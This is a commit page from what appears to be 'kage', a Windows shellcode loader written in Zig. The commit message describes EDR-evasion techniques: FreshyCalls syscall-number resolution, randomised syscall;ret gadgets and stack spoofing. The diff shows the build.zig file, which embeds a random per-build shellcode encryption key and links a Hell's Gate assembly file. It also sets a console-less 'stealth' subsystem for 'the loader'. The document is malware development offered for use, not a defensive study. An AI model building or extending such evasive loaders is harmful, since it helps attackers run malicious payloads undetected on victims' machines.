kage: freshycalls + rand gadgets + stack spoof

- freshycalls sorted export rva table instead of hells gate for SSNs
- 64 syscall;ret gadgets in a pool, picks random via xorshift64
- hells_gate.s pushes fake ntdll return before syscall now
- got rid of the 5 wrapper functions, just one syscall_dispatch
- deleted win32.zig, using std.os.windows. named structs for peb
- asm volatile and enum fixes so this compiles on zig 0.16
- build.zig: added .abi = .gnu, .Windows subsystem
This commit is contained in:
2026-07-18 09:30:07 +01:00
parent 8d3cef7e74
commit f9eba1ed1b
8 changed files with 429 additions and 162 deletions
+13 -6
View File
@@ -4,31 +4,38 @@ pub fn build(b: *std.Build) void {
const target = b.standardTargetOptions(.{ .default_target = .{
.cpu_arch = .x86_64,
.os_tag = .windows,
.abi = .gnu,
} });
const optimize = b.standardOptimizeOption(.{});
var key: [16]u8 = undefined;
var rng = std.Random.DefaultPrng.init(@intFromPtr(b));
rng.random().bytes(&key);
const key_u128 = std.mem.readInt(u128, &key, .little);
const options = b.addOptions();
options.addOption(u128, "shellcode_key", key_u128);
const module = b.createModule(.{
.root_source_file = b.path("src/main.zig"),
.target = target,
.optimize = optimize,
});
module.addOptions("build_options", options);
module.addAssemblyFile(b.path("src/hells_gate.s"));
const exe = b.addExecutable(.{
.name = "kage",
.root_module = module,
});
module.addAssemblyFile(b.path("src/hells_gate.s"));
// .Windows = no console window (stealth). Change to .Console for debug output.
exe.subsystem = .Windows;
b.installArtifact(exe);
const run_cmd = b.addRunArtifact(exe);
run_cmd.step.dependOn(b.getInstallStep());
if (b.args) |args| {
run_cmd.addArgs(args);
}
if (b.args) |args| run_cmd.addArgs(args);
const run_step = b.step("run", "Run the loader");
run_step.dependOn(&run_cmd.step);